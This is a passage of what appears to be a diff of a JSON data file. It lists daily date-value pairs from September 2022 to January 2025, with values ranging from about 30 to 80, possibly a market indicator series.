45.74386490981499 + ], + [ + "2022-09-12", + 46.75033669131451 + ], + [ + "2022-09-13", + 37.22482695534586 + ], + [ + "2022-09-14", + 39.50153703691724 + ], + [ + "2022-09-15", + 37.346221376822065 + ], + [ + "2022-09-16", + 38.62723615762107 + ], + [ + "2022-09-19", + 39.79577080938274 + ], + [ + "2022-09-20", + 37.82349994622355 + ], + [ + "2022-09-21", + 36.366787142462854 + ], + [ + "2022-09-22", + 32.74733557481382 + ], + [ + "2022-09-23", + 31.148643431126445 + ], + [ + "2022-09-26", + 29.438604480334163 + ], + [ + "2022-09-27", + 31.897448107422534 + ], + [ + "2022-09-28", + 35.616998821573375 + ], + [ + "2022-09-29", + 31.496262397738562 + ], + [ + "2022-09-30", + 29.53105734840466 + ], + [ + "2022-10-03", + 37.81312041879082 + ], + [ + "2022-10-04", + 47.19532054469035 + ], + [ + "2022-10-05", + 48.71429892763088 + ], + [ + "2022-10-06", + 47.98167457779955 + ], + [ + "2022-10-07", + 38.62109305344511 + ], + [ + "2022-10-10", + 34.73386237420142 + ], + [ + "2022-10-11", + 31.966299069198413 + ], + [ + "2022-10-12", + 31.071539288161063 + ], + [ + "2022-10-13", + 36.67592303076479 + ], + [ + "2022-10-14", + 32.44399378586141 + ], + [ + "2022-10-17", + 36.30113795276771 + ], + [ + "2022-10-18", + 36.94425527071447 + ], + [ + "2022-10-19", + 38.19860215386018 + ], + [ + "2022-10-20", + 39.46241018183266 + ], + [ + "2022-10-21", + 46.56059760267537 + ], + [ + "2022-10-24", + 47.362582567871016 + ], + [ + "2022-10-25", + 51.51715290618487 + ], + [ + "2022-10-26", + 49.655907686918106 + ], + [ + "2022-10-27", + 46.43188283536201 + ], + [ + "2022-10-28", + 53.49096008951073 + ], + [ + "2022-10-31", + 49.439501217620666 + ], + [ + "2022-11-01", + 50.88868716325117 + ], + [ + "2022-11-02", + 45.357743185575146 + ], + [ + "2022-11-03", + 43.27600177849635 + ], + [ + "2022-11-04", + 51.45236151043502 + ], + [ + "2022-11-07", + 54.87527699381811 + ], + [ + "2022-11-08", + 58.18018329042441 + ], + [ + "2022-11-09", + 52.08467982428807 + ], + [ + "2022-11-10", + 64.60133280285136 + ], + [ + "2022-11-11", + 67.57800976456713 + ], + [ + "2022-11-14", + 65.39482525722599 + ], + [ + "2022-11-15", + 68.28405430238381 + ], + [ + "2022-11-16", + 60.332198614102744 + ], + [ + "2022-11-17", + 61.216813000501126 + ], + [ + "2022-11-18", + 61.482472464951414 + ], + [ + "2022-11-21", + 58.28123059942286 + ], + [ + "2022-11-22", + 62.04209977764458 + ], + [ + "2022-11-23", + 63.52094156141761 + ], + [ + "2022-11-25", + 60.67910467648186 + ], + [ + "2022-11-28", + 55.71151830766351 + ], + [ + "2022-11-29", + 54.9807989688696 + ], + [ + "2022-11-30", + 63.051662473786294 + ], + [ + "2022-12-01", + 61.542078318731186 + ], + [ + "2022-12-02", + 59.163706800283705 + ], + [ + "2022-12-05", + 56.55562334960684 + ], + [ + "2022-12-06", + 52.46794555792128 + ], + [ + "2022-12-07", + 52.06321796169595 + ], + [ + "2022-12-08", + 56.87877583598113 + ], + [ + "2022-12-09", + 54.92064707706933 + ], + [ + "2022-12-12", + 57.87881381394852 + ], + [ + "2022-12-13", + 60.6277333652663 + ], + [ + "2022-12-14", + 57.06639759423532 + ], + [ + "2022-12-15", + 48.537925556281856 + ], + [ + "2022-12-16", + 47.23546352055422 + ], + [ + "2022-12-19", + 45.11911025631554 + ], + [ + "2022-12-20", + 44.084036662987934 + ], + [ + "2022-12-21", + 48.7320955489515 + ], + [ + "2022-12-22", + 41.856392254105444 + ], + [ + "2022-12-23", + 42.036366668132544 + ], + [ + "2022-12-27", + 39.28606475516324 + ], + [ + "2022-12-28", + 37.18586001946237 + ], + [ + "2022-12-29", + 44.054939327943465 + ], + [ + "2022-12-30", + 43.901305453083985 + ], + [ + "2023-01-03", + 42.2216578728669 + ], + [ + "2023-01-04", + 47.84439984723732 + ], + [ + "2023-01-05", + 44.69690365768357 + ], + [ + "2023-01-06", + 53.613064258323774 + ], + [ + "2023-01-09", + 56.72619216792896 + ], + [ + "2023-01-10", + 58.85238962664362 + ], + [ + "2023-01-11", + 60.94069029150752 + ], + [ + "2023-01-12", + 62.877389212555656 + ], + [ + "2023-01-13", + 63.54729685153949 + ], + [ + "2023-01-17", + 63.74229383207049 + ], + [ + "2023-01-18", + 62.092029533834946 + ], + [ + "2023-01-19", + 54.07802051391214 + ], + [ + "2023-01-20", + 60.09273373145161 + ], + [ + "2023-01-23", + 67.64451404977981 + ], + [ + "2023-01-24", + 65.53360079189626 + ], + [ + "2023-01-25", + 65.94133895806843 + ], + [ + "2023-01-26", + 68.4453459489736 + ], + [ + "2023-01-27", + 66.42379287619573 + ], + [ + "2023-01-30", + 58.69164365336632 + ], + [ + "2023-01-31", + 61.952311227477175 + ], + [ + "2023-02-01", + 69.36911986763093 + ], + [ + "2023-02-02", + 72.10640846841939 + ], + [ + "2023-02-03", + 66.58413490965768 + ], + [ + "2023-02-06", + 62.385433135206675 + ], + [ + "2023-02-07", + 66.73678989426799 + ], + [ + "2023-02-08", + 61.40004173442402 + ], + [ + "2023-02-09", + 61.78223812053786 + ], + [ + "2023-02-10", + 57.92192524963744 + ], + [ + "2023-02-13", + 60.34889546089619 + ], + [ + "2023-02-14", + 63.21087828859138 + ], + [ + "2023-02-15", + 63.85393068841093 + ], + [ + "2023-02-16", + 57.340847205962234 + ], + [ + "2023-02-17", + 53.68700929782788 + ], + [ + "2023-02-21", + 47.07400104941917 + ], + [ + "2023-02-22", + 46.19603777405437 + ], + [ + "2023-02-23", + 52.68181544057441 + ], + [ + "2023-02-24", + 49.09577903843129 + ], + [ + "2023-02-27", + 50.155962106016396 + ], + [ + "2023-02-28", + 50.873464267823785 + ], + [ + "2023-03-01", + 50.933238514103074 + ], + [ + "2023-03-02", + 52.77789512345921 + ], + [ + "2023-03-03", + 56.22030927148697 + ], + [ + "2023-03-06", + 53.030867229323746 + ], + [ + "2023-03-07", + 50.280117383563145 + ], + [ + "2023-03-08", + 56.3654789531146 + ], + [ + "2023-03-09", + 51.189206996221756 + ], + [ + "2023-03-10", + 46.778414083260095 + ], + [ + "2023-03-13", + 46.85249077139656 + ], + [ + "2023-03-14", + 53.70692566267112 + ], + [ + "2023-03-15", + 50.810215534882026 + ], + [ + "2023-03-16", + 58.74377559526046 + ], + [ + "2023-03-17", + 57.110032497304225 + ], + [ + "2023-03-20", + 59.1858101382671 + ], + [ + "2023-03-21", + 59.583727794710256 + ], + [ + "2023-03-22", + 56.59194129387581 + ], + [ + "2023-03-23", + 62.14922773563537 + ], + [ + "2023-03-24", + 57.009559649507146 + ], + [ + "2023-03-27", + 53.822332840253445 + ], + [ + "2023-03-28", + 51.85258125086892 + ], + [ + "2023-03-29", + 58.771331664308796 + ], + [ + "2023-03-30", + 61.890002249464246 + ], + [ + "2023-03-31", + 63.04216055763219 + ], + [ + "2023-04-03", + 60.29122056601465 + ], + [ + "2023-04-04", + 54.7805626477972 + ], + [ + "2023-04-05", + 50.26618327509214 + ], + [ + "2023-04-06", + 48.996453804730656 + ], + [ + "2023-04-10", + 53.327106273805946 + ], + [ + "2023-04-11", + 51.89156716157283 + ], + [ + "2023-04-12", + 47.15518901070485 + ], + [ + "2023-04-13", + 49.35498056664838 + ], + [ + "2023-04-14", + 48.9365618458319 + ], + [ + "2023-04-17", + 48.9365618458319 + ], + [ + "2023-04-18", + 50.29183620975655 + ], + [ + "2023-04-19", + 46.886516888671075 + ], + [ + "2023-04-20", + 46.601474751665286 + ], + [ + "2023-04-21", + 44.31064330864818 + ], + [ + "2023-04-24", + 42.93083782990747 + ], + [ + "2023-04-25", + 34.3446868607753 + ], + [ + "2023-04-26", + 36.446085265037006 + ], + [ + "2023-04-27", + 38.13990908850792 + ], + [ + "2023-04-28", + 44.92752622676579 + ], + [ + "2023-05-01", + 48.06323263529737 + ], + [ + "2023-05-02", + 45.825809206504424 + ], + [ + "2023-05-03", + 42.430882377279886 + ], + [ + "2023-05-04", + 40.85608695892745 + ], + [ + "2023-05-05", + 48.90843178234551 + ], + [ + "2023-05-08", + 50.32011889289947 + ], + [ + "2023-05-09", + 44.906542233800245 + ], + [ + "2023-05-10", + 48.42129882800719 + ], + [ + "2023-05-11", + 46.351790026533685 + ], + [ + "2023-05-12", + 46.05448203177973 + ], + [ + "2023-05-15", + 55.14392351158834 + ], + [ + "2023-05-16", + 54.44397528778482 + ], + [ + "2023-05-17", + 61.391706747193055 + ], + [ + "2023-05-18", + 68.2302155673471 + ], + [ + "2023-05-19", + 66.11145854837397 + ], + [ + "2023-05-22", + 66.85209613475067 + ], + [ + "2023-05-23", + 61.64591240912922 + ], + [ + "2023-05-24", + 55.04498887260892 + ], + [ + "2023-05-25", + 68.37703019830579 + ], + [ + "2023-05-26", + 76.29974417442905 + ], + [ + "2023-05-30", + 76.0198346620339 + ], + [ + "2023-05-31", + 67.81178182192687 + ], + [ + "2023-06-01", + 70.08293108881843 + ], + [ + "2023-06-02", + 69.35022341550219 + ], + [ + "2023-06-05", + 64.57411744862695 + ], + [ + "2023-06-06", + 66.48253300663819 + ], + [ + "2023-06-07", + 66.00969093314646 + ], + [ + "2023-06-08", + 67.72512341110004 + ], + [ + "2023-06-09", + 68.17510600735424 + ], + [ + "2023-06-12", + 73.11936410459006 + ], + [ + "2023-06-13", + 74.92039335452797 + ], + [ + "2023-06-14", + 76.72455404127294 + ], + [ + "2023-06-15", + 73.36766209236467 + ], + [ + "2023-06-16", + 69.72826545732383 + ], + [ + "2023-06-20", + 66.63517014413904 + ], + [ + "2023-06-21", + 58.31803378382318 + ], + [ + "2023-06-22", + 59.33811079787152 + ], + [ + "2023-06-23", + 53.943096280688515 + ], + [ + "2023-06-26", + 54.74365066570718 + ], + [ + "2023-06-27", + 62.36713113746033 + ], + [ + "2023-06-28", + 59.88616955009856 + ], + [ + "2023-06-29", + 59.948073331130594 + ], + [ + "2023-06-30", + 63.310783571911585 + ], + [ + "2023-07-03", + 65.15149877566125 + ], + [ + "2023-07-05", + 57.377227851668394 + ], + [ + "2023-07-06", + 53.53870652775167 + ], + [ + "2023-07-07", + 53.64983910546602 + ], + [ + "2023-07-10", + 58.84457907231645 + ], + [ + "2023-07-11", + 58.854243176746 + ], + [ + "2023-07-12", + 63.220332015645255 + ], + [ + "2023-07-13", + 67.42595386708119 + ], + [ + "2023-07-14", + 62.65977999618245 + ], + [ + "2023-07-17", + 67.3569667973029 + ], + [ + "2023-07-18", + 67.70276651256856 + ], + [ + "2023-07-19", + 63.070067896488325 + ], + [ + "2023-07-20", + 51.56748468718197 + ], + [ + "2023-07-21", + 53.7413058853246 + ], + [ + "2023-07-24", + 53.72992605711751 + ], + [ + "2023-07-25", + 57.852966544239266 + ], + [ + "2023-07-26", + 53.56266287716563 + ], + [ + "2023-07-27", + 58.06120920292699 + ], + [ + "2023-07-28", + 62.66770788922955 + ], + [ + "2023-07-31", + 63.50530753021125 + ], + [ + "2023-08-01", + 63.64049956929438 + ], + [ + "2023-08-02", + 51.30327601273997 + ], + [ + "2023-08-03", + 50.62271250508659 + ], + [ + "2023-08-04", + 50.182813755899275 + ], + [ + "2023-08-07", + 53.108283549073064 + ], + [ + "2023-08-08", + 48.42920056927073 + ], + [ + "2023-08-09", + 43.72262542149467 + ], + [ + "2023-08-10", + 42.75684109617004 + ], + [ + "2023-08-11", + 37.42815877377469 + ], + [ + "2023-08-14", + 45.86566016541944 + ], + [ + "2023-08-15", + 42.21536306807897 + ], + [ + "2023-08-16", + 38.45789989094003 + ], + [ + "2023-08-17", + 36.71487903293631 + ], + [ + "2023-08-18", + 38.35321399337403 + ], + [ + "2023-08-21", + 46.3852552045031 + ], + [ + "2023-08-22", + 44.41764810406466 + ], + [ + "2023-08-23", + 49.69861637337851 + ], + [ + "2023-08-24", + 42.52113339889994 + ], + [ + "2023-08-25", + 43.624417159191516 + ], + [ + "2023-08-28", + 46.87166389948005 + ], + [ + "2023-08-29", + 52.996801628520295 + ], + [ + "2023-08-30", + 54.04782912936798 + ], + [ + "2023-08-31", + 55.62373083274383 + ], + [ + "2023-09-01", + 56.23620934069362 + ], + [ + "2023-09-05", + 56.129606503048734 + ], + [ + "2023-09-06", + 53.74104107026582 + ], + [ + "2023-09-07", + 46.97467002883772 + ], + [ + "2023-09-08", + 45.60801507799814 + ], + [ + "2023-09-11", + 45.45293944828272 + ], + [ + "2023-09-12", + 43.090665854027634 + ], + [ + "2023-09-13", + 44.936840989957865 + ], + [ + "2023-09-14", + 47.508522344063714 + ], + [ + "2023-09-15", + 39.447936306564365 + ], + [ + "2023-09-18", + 40.690784156622826 + ], + [ + "2023-09-19", + 38.5747574347927 + ], + [ + "2023-09-20", + 34.80990609512415 + ], + [ + "2023-09-21", + 31.18604004050357 + ], + [ + "2023-09-22", + 34.442362089134136 + ], + [ + "2023-09-25", + 37.27360575410352 + ], + [ + "2023-09-26", + 33.39140759162592 + ], + [ + "2023-09-27", + 36.77289298591771 + ], + [ + "2023-09-28", + 43.33585154704179 + ], + [ + "2023-09-29", + 44.570756571583935 + ], + [ + "2023-10-02", + 46.33123185166481 + ], + [ + "2023-10-03", + 40.60702964129258 + ], + [ + "2023-10-04", + 45.18994704452807 + ], + [ + "2023-10-05", + 43.84208822491695 + ], + [ + "2023-10-06", + 50.81046187397125 + ], + [ + "2023-10-09", + 50.01631938976331 + ], + [ + "2023-10-10", + 53.979506458862545 + ], + [ + "2023-10-11", + 56.20260343582138 + ], + [ + "2023-10-12", + 56.969331000954746 + ], + [ + "2023-10-13", + 47.42784956791358 + ], + [ + "2023-10-16", + 51.824537471531336 + ], + [ + "2023-10-17", + 49.49337479809466 + ], + [ + "2023-10-18", + 44.24167964634132 + ], + [ + "2023-10-19", + 40.36983203499809 + ], + [ + "2023-10-20", + 37.135091818691265 + ], + [ + "2023-10-23", + 35.93362177174484 + ], + [ + "2023-10-24", + 40.82640707395946 + ], + [ + "2023-10-25", + 32.70464973341895 + ], + [ + "2023-10-26", + 31.744568217412464 + ], + [ + "2023-10-27", + 35.416597962179125 + ], + [ + "2023-10-30", + 33.010736536156074 + ], + [ + "2023-10-31", + 36.15823495973152 + ], + [ + "2023-11-01", + 43.570851515249366 + ], + [ + "2023-11-02", + 49.77815384536802 + ], + [ + "2023-11-03", + 55.94990675359532 + ], + [ + "2023-11-06", + 55.41954736237235 + ], + [ + "2023-11-07", + 56.92844851340435 + ], + [ + "2023-11-08", + 57.1765114471113 + ], + [ + "2023-11-09", + 55.533107413935575 + ], + [ + "2023-11-10", + 64.68801562254203 + ], + [ + "2023-11-13", + 61.27394133511085 + ], + [ + "2023-11-14", + 68.0918230979854 + ], + [ + "2023-11-15", + 69.27800868875349 + ], + [ + "2023-11-16", + 69.36109518812297 + ], + [ + "2023-11-17", + 70.59460255125221 + ], + [ + "2023-11-20", + 73.0603882057226 + ], + [ + "2023-11-21", + 65.45405021552949 + ], + [ + "2023-11-22", + 66.09157497976697 + ], + [ + "2023-11-24", + 66.2429103918937 + ], + [ + "2023-11-27", + 65.62900868191045 + ], + [ + "2023-11-28", + 63.00042620653094 + ], + [ + "2023-11-29", + 65.72629686317298 + ], + [ + "2023-11-30", + 62.50079795533218 + ], + [ + "2023-12-01", + 63.778745243426975 + ], + [ + "2023-12-04", + 58.6190529868163 + ], + [ + "2023-12-05", + 56.16400103894907 + ], + [ + "2023-12-06", + 53.55676905411141 + ], + [ + "2023-12-07", + 61.80459359271865 + ], + [ + "2023-12-08", + 63.8935485269591 + ], + [ + "2023-12-11", + 71.26041516862077 + ], + [ + "2023-12-12", + 72.57724888760625 + ], + [ + "2023-12-13", + 75.20925778670957 + ], + [ + "2023-12-14", + 79.14894581411525 + ], + [ + "2023-12-15", + 79.62971418918707 + ], + [ + "2023-12-18", + 78.17608415537084 + ], + [ + "2023-12-19", + 78.96895718481174 + ], + [ + "2023-12-20", + 64.80914931589345 + ], + [ + "2023-12-21", + 70.04919206239717 + ], + [ + "2023-12-22", + 70.60981766421962 + ], + [ + "2023-12-26", + 73.55885492294654 + ], + [ + "2023-12-27", + 73.974988729301 + ], + [ + "2023-12-28", + 73.06904565414742 + ], + [ + "2023-12-29", + 69.48740593746123 + ], + [ + "2024-01-02", + 55.274914645626865 + ], + [ + "2024-01-03", + 49.06173273951064 + ], + [ + "2024-01-04", + 46.88751978086389 + ], + [ + "2024-01-05", + 48.49571334999282 + ], + [ + "2024-01-08", + 56.809444070922495 + ], + [ + "2024-01-09", + 56.89011338499681 + ], + [ + "2024-01-10", + 55.77990118418889 + ], + [ + "2024-01-11", + 56.77525730079971 + ], + [ + "2024-01-12", + 55.171691014300805 + ], + [ + "2024-01-16", + 59.14620165585019 + ], + [ + "2024-01-17", + 55.661449093654674 + ], + [ + "2024-01-18", + 63.8491284877391 + ], + [ + "2024-01-19", + 70.92568716516061 + ], + [ + "2024-01-22", + 71.44958747029818 + ], + [ + "2024-01-23", + 72.53197562742727 + ], + [ + "2024-01-24", + 74.80525462711739 + ], + [ + "2024-01-25", + 73.5374589674589 + ], + [ + "2024-01-26", + 62.49159860851846 + ], + [ + "2024-01-29", + 64.64003353019419 + ], + [ + "2024-01-30", + 59.1655912666188 + ], + [ + "2024-01-31", + 54.57241745802208 + ], + [ + "2024-02-01", + 55.81659605813146 + ], + [ + "2024-02-02", + 58.95580746309807 + ], + [ + "2024-02-05", + 62.098736957580336 + ], + [ + "2024-02-06", + 57.963893699096275 + ], + [ + "2024-02-07", + 61.5393701752591 + ], + [ + "2024-02-08", + 65.17915260062614 + ], + [ + "2024-02-09", + 68.91250832836931 + ], + [ + "2024-02-12", + 68.18222963643032 + ], + [ + "2024-02-13", + 60.37924829679698 + ], + [ + "2024-02-14", + 65.02089788245087 + ], + [ + "2024-02-15", + 64.66865366621607 + ], + [ + "2024-02-16", + 62.50537880532146 + ], + [ + "2024-02-20", + 56.491544791262385 + ], + [ + "2024-02-21", + 55.71774718995924 + ], + [ + "2024-02-22", + 66.35474092362578 + ], + [ + "2024-02-23", + 62.63382184545987 + ], + [ + "2024-02-26", + 64.56995794886728 + ], + [ + "2024-02-27", + 64.2048299268183 + ], + [ + "2024-02-28", + 60.07767751403579 + ], + [ + "2024-02-29", + 65.72936796571858 + ], + [ + "2024-03-01", + 72.49482951854131 + ], + [ + "2024-03-04", + 73.83393097446772 + ], + [ + "2024-03-05", + 66.77905660646593 + ], + [ + "2024-03-06", + 70.50821079007908 + ], + [ + "2024-03-07", + 74.85467743420924 + ], + [ + "2024-03-08", + 62.70915047355154 + ], + [ + "2024-03-11", + 59.437910518545046 + ], + [ + "2024-03-12", + 62.67011276370118 + ], + [ + "2024-03-13", + 56.8227853471148 + ], + [ + "2024-03-14", + 53.168948652625936 + ], + [ + "2024-03-15", + 51.692247307941685 + ], + [ + "2024-03-18", + 51.52642169684079 + ], + [ + "2024-03-19", + 49.678915928558695 + ], + [ + "2024-03-20", + 53.31388004311798 + ], + [ + "2024-03-21", + 57.73350343986587 + ], + [ + "2024-03-22", + 57.96700128977682 + ], + [ + "2024-03-25", + 56.86434078516437 + ], + [ + "2024-03-26", + 54.71190617449144 + ], + [ + "2024-03-27", + 57.57706092207007 + ], + [ + "2024-03-28", + 57.8233721323971 + ], + [ + "2024-04-01", + 60.28582459887511 + ], + [ + "2024-04-02", + 55.15669074647833 + ], + [ + "2024-04-03", + 55.8801971618556 + ], + [ + "2024-04-04", + 47.51878526272714 + ], + [ + "2024-04-05", + 50.75278420626522 + ], + [ + "2024-04-08", + 51.45899499369058 + ], + [ + "2024-04-09", + 54.41099603015356 + ], + [ + "2024-04-10", + 48.91533240572584 + ], + [ + "2024-04-11", + 54.87693485526683 + ], + [ + "2024-04-12", + 46.24133276433734 + ], + [ + "2024-04-15", + 43.49231563603895 + ], + [ + "2024-04-16", + 45.55103737513363 + ], + [ + "2024-04-17", + 39.32287692709557 + ], + [ + "2024-04-18", + 36.29345703098142 + ], + [ + "2024-04-19", + 30.67189107972966 + ], + [ + "2024-04-22", + 34.97626042788632 + ], + [ + "2024-04-23", + 40.130028651161304 + ], + [ + "2024-04-24", + 43.20455579441925 + ], + [ + "2024-04-25", + 47.41939771304562 + ], + [ + "2024-04-26", + 51.88112107257864 + ], + [ + "2024-04-29", + 53.444486630665516 + ], + [ + "2024-04-30", + 48.73216028684629 + ], + [ + "2024-05-01", + 42.355411404860256 + ], + [ + "2024-05-02", + 47.1457261221433 + ], + [ + "2024-05-03", + 51.58136534654667 + ], + [ + "2024-05-06", + 55.38488608209197 + ], + [ + "2024-05-07", + 53.42211897957148 + ], + [ + "2024-05-08", + 53.61277377502817 + ], + [ + "2024-05-09", + 52.70557383334827 + ], + [ + "2024-05-10", + 54.852646493332294 + ], + [ + "2024-05-13", + 55.32214809251076 + ], + [ + "2024-05-14", + 58.986880658111126 + ], + [ + "2024-05-15", + 64.38712450434087 + ], + [ + "2024-05-16", + 62.79011247060858 + ], + [ + "2024-05-17", + 60.9181820977387 + ], + [ + "2024-05-20", + 65.22911041384535 + ], + [ + "2024-05-21", + 64.09163005544713 + ], + [ + "2024-05-22", + 66.38918783685963 + ], + [ + "2024-05-23", + 64.24858232610916 + ], + [ + "2024-05-24", + 68.1375958692363 + ], + [ + "2024-05-28", + 71.08007097469009 + ], + [ + "2024-05-29", + 63.25885841011416 + ], + [ + "2024-05-30", + 60.8828378283498 + ], + [ + "2024-05-31", + 58.14595596087325 + ], + [ + "2024-06-03", + 58.54316941035945 + ], + [ + "2024-06-04", + 55.796940564132576 + ], + [ + "2024-06-05", + 65.48661804018845 + ], + [ + "2024-06-06", + 62.59519353864851 + ], + [ + "2024-06-07", + 61.536540351077726 + ], + [ + "2024-06-10", + 64.63219857579452 + ], + [ + "2024-06-11", + 64.80875791803727 + ], + [ + "2024-06-12", + 70.28711634024987 + ], + [ + "2024-06-13", + 72.13911757275773 + ], + [ + "2024-06-14", + 70.55460992633407 + ], + [ + "2024-06-17", + 73.31518221705109 + ], + [ + "2024-06-18", + 75.35342657807468 + ], + [ + "2024-06-20", + 63.98702860520107 + ], + [ + "2024-06-21", + 60.55002211230331 + ], + [ + "2024-06-24", + 51.85586680701379 + ], + [ + "2024-06-25", + 55.4589588396764 + ], + [ + "2024-06-26", + 54.33192058776812 + ], + [ + "2024-06-27", + 52.81490238225924 + ], + [ + "2024-06-28", + 55.441465553488044 + ], + [ + "2024-07-01", + 55.42800818591962 + ], + [ + "2024-07-02", + 59.13353663170069 + ], + [ + "2024-07-03", + 63.10331004466334 + ], + [ + "2024-07-05", + 63.56038531870833 + ], + [ + "2024-07-08", + 67.72039546566565 + ], + [ + "2024-07-09", + 67.51420530407657 + ], + [ + "2024-07-10", + 72.10365877304218 + ], + [ + "2024-07-11", + 59.07070696395274 + ], + [ + "2024-07-12", + 61.74088682875225 + ], + [ + "2024-07-15", + 61.9883296961354 + ], + [ + "2024-07-16", + 63.40338681054135 + ], + [ + "2024-07-17", + 43.31841868838395 + ], + [ + "2024-07-18", + 44.06653057794477 + ], + [ + "2024-07-19", + 38.47767548279059 + ], + [ + "2024-07-22", + 47.83707524345362 + ], + [ + "2024-07-23", + 45.071755626403785 + ], + [ + "2024-07-24", + 36.97978012825854 + ], + [ + "2024-07-25", + 34.34425821639857 + ], + [ + "2024-07-26", + 38.76851310020967 + ], + [ + "2024-07-29", + 38.490348609502945 + ], + [ + "2024-07-30", + 33.948942032567146 + ], + [ + "2024-07-31", + 46.137929802180196 + ], + [ + "2024-08-01", + 37.579601687640434 + ], + [ + "2024-08-02", + 33.058866209466075 + ], + [ + "2024-08-05", + 31.76510847829134 + ], + [ + "2024-08-06", + 33.18464551849017 + ], + [ + "2024-08-07", + 31.02743175749248 + ], + [ + "2024-08-08", + 40.977488901638914 + ], + [ + "2024-08-09", + 40.40229496655692 + ], + [ + "2024-08-12", + 41.262025795931635 + ], + [ + "2024-08-13", + 47.089810532499776 + ], + [ + "2024-08-14", + 46.7663264395456 + ], + [ + "2024-08-15", + 53.32165580828915 + ], + [ + "2024-08-16", + 52.99767572640033 + ], + [ + "2024-08-19", + 55.341347129445246 + ], + [ + "2024-08-20", + 53.085508280052245 + ], + [ + "2024-08-21", + 55.16746664583103 + ], + [ + "2024-08-22", + 49.398252291997906 + ], + [ + "2024-08-23", + 53.37557664927069 + ], + [ + "2024-08-26", + 49.355565725672996 + ], + [ + "2024-08-27", + 51.062497353108824 + ], + [ + "2024-08-28", + 48.182411488496264 + ], + [ + "2024-08-29", + 47.72832163992184 + ], + [ + "2024-08-30", + 52.13068193350941 + ], + [ + "2024-09-03", + 40.994973884655955 + ], + [ + "2024-09-04", + 41.52873151311077 + ], + [ + "2024-09-05", + 40.87456772745676 + ], + [ + "2024-09-06", + 36.02762028740478 + ], + [ + "2024-09-09", + 39.444761145132915 + ], + [ + "2024-09-10", + 41.28034056812896 + ], + [ + "2024-09-11", + 48.73813178553604 + ], + [ + "2024-09-12", + 48.08447723299419 + ], + [ + "2024-09-13", + 50.94062231734229 + ], + [ + "2024-09-16", + 48.74683699404742 + ], + [ + "2024-09-17", + 48.962026985718644 + ], + [ + "2024-09-18", + 47.04751960889432 + ], + [ + "2024-09-19", + 54.37651686392782 + ], + [ + "2024-09-20", + 51.62084295224024 + ], + [ + "2024-09-23", + 52.302985064292095 + ], + [ + "2024-09-24", + 54.46469770339756 + ], + [ + "2024-09-25", + 55.709151951358436 + ], + [ + "2024-09-26", + 61.61141956437376 + ], + [ + "2024-09-27", + 57.799412222767174 + ], + [ + "2024-09-30", + 55.72983292137974 + ], + [ + "2024-10-01", + 49.79493644569964 + ], + [ + "2024-10-02", + 52.34969298198592 + ], + [ + "2024-10-03", + 53.039940325181526 + ], + [ + "2024-10-04", + 55.701683507188235 + ], + [ + "2024-10-07", + 55.02348921210397 + ], + [ + "2024-10-08", + 57.05258545806209 + ], + [ + "2024-10-09", + 59.17579405533607 + ], + [ + "2024-10-10", + 57.11115429605166 + ], + [ + "2024-10-11", + 58.94361750432075 + ], + [ + "2024-10-14", + 62.73987836492443 + ], + [ + "2024-10-15", + 48.80873741724331 + ], + [ + "2024-10-16", + 48.8087374172433 + ], + [ + "2024-10-17", + 50.637822692039876 + ], + [ + "2024-10-18", + 50.85968800920327 + ], + [ + "2024-10-21", + 50.36059437562177 + ], + [ + "2024-10-22", + 49.33014342509716 + ], + [ + "2024-10-23", + 46.85227185039587 + ], + [ + "2024-10-24", + 48.570598620024334 + ], + [ + "2024-10-25", + 51.61875351410397 + ], + [ + "2024-10-28", + 51.80763601423392 + ], + [ + "2024-10-29", + 58.79841615151011 + ], + [ + "2024-10-30", + 47.82348539013951 + ], + [ + "2024-10-31", + 39.41397380591108 + ], + [ + "2024-11-01", + 42.29180784032311 + ], + [ + "2024-11-04", + 41.13980350006712 + ], + [ + "2024-11-05", + 44.42594640325724 + ], + [ + "2024-11-06", + 51.756778367377905 + ], + [ + "2024-11-07", + 56.32170816895582 + ], + [ + "2024-11-08", + 54.29907373941557 + ], + [ + "2024-11-11", + 48.107936974970606 + ], + [ + "2024-11-12", + 45.72259977298635 + ], + [ + "2024-11-13", + 41.45716242109802 + ], + [ + "2024-11-14", + 41.343252547541695 + ], + [ + "2024-11-15", + 35.640011996894415 + ], + [ + "2024-11-18", + 39.15050099106963 + ], + [ + "2024-11-19", + 39.68262388672043 + ], + [ + "2024-11-20", + 38.24205932044951 + ], + [ + "2024-11-21", + 42.834374888497955 + ], + [ + "2024-11-22", + 42.95636822246167 + ], + [ + "2024-11-25", + 45.872746640075334 + ], + [ + "2024-11-26", + 42.71816244325727 + ], + [ + "2024-11-27", + 39.71463502894116 + ], + [ + "2024-11-29", + 43.889746603649385 + ], + [ + "2024-12-02", + 51.15076504306559 + ], + [ + "2024-12-03", + 49.62349305065496 + ], + [ + "2024-12-04", + 53.13193314591765 + ], + [ + "2024-12-05", + 47.931048157259376 + ], + [ + "2024-12-06", + 49.596999558998775 + ], + [ + "2024-12-09", + 48.26162326963396 + ], + [ + "2024-12-10", + 42.25174674542543 + ], + [ + "2024-12-11", + 49.27646551358606 + ], + [ + "2024-12-12", + 47.314282810605974 + ], + [ + "2024-12-13", + 54.30019188918906 + ], + [ + "2024-12-16", + 58.362131662776676 + ], + [ + "2024-12-17", + 54.321634715329104 + ], + [ + "2024-12-18", + 45.5643723013598 + ], + [ + "2024-12-19", + 42.34987822469047 + ], + [ + "2024-12-20", + 45.603577313221066 + ], + [ + "2024-12-23", + 52.22607480597832 + ], + [ + "2024-12-24", + 54.326565520415265 + ], + [ + "2024-12-26", + 54.24766322315323 + ], + [ + "2024-12-27", + 52.05075125867605 + ], + [ + "2024-12-30", + 47.29252705305855 + ], + [ + "2024-12-31", + 45.45536021082741 + ], + [ + "2025-01-02", + 47.09973479073097 + ], + [ + "2025-01-03", + 53.511488125060175 + ], + [ + "2025-01-06", + 59.532206100907786 + ], + [ + "2025-01-07", + 55.76418901835583 + ], + [ + "2025-01-08", + 53.15149140382853 + ], + [ + "2025-01-10", + 47.467264550716614 + ], + [ + "2025-01-13", + 46.79113394131293 + ], + [ + "2025-01-14", + 48.477992660195135 + ], + [ + "2025-01-15", + 53.224305731850805 + ], + [ + "2025-01-16", + 53.58187242702915 + ], + [ + "2025-01-17", + 59.799608401221484 + ], + [ + "2025-01-21", + 62.1840171893491 + ], + [ + "2025-01-22", + 64.95915261240135 + ], + [ + "2025-01-23", + 64.29374893445308 + ], + [ + "2025-01-24", + 57.47780771951636 + ], + [ + "2025-01-27", + 40.00862326989383 + ], + [ + "2025-01-28", + 41.02235513435013 + ], + [ + "2025-01-29", + 42.00008038962368 + ], + [ + "2025-01-30", + 46.713467112788614 + ], + [ + "2025-01-31", + 